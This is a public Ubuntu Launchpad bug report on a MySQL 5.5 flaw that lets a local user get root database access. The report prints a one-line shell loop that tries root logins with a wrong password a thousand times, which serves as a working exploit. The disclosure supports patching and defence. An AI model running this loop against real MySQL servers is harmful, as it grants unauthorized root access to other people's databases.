local mysql root access - exploit in the wild

Bug #1011462 reported by Ante Karamatić
258
This bug affects 1 person
Affects Status Importance Assigned to Milestone
mysql-5.5 (Ubuntu)
New
Undecided
Unassigned

Bug Description

MySQL bug that can be exploited by a simple:

for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done

Reproduced on Ubuntu 12.04 64bit.

more info at: http://seclists.org/oss-sec/2012/q2/493

Ante Karamatić (ivoks)
description: updated
To post a comment you must log in.
This report contains Public Security information  
Everyone can see this security related information.

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.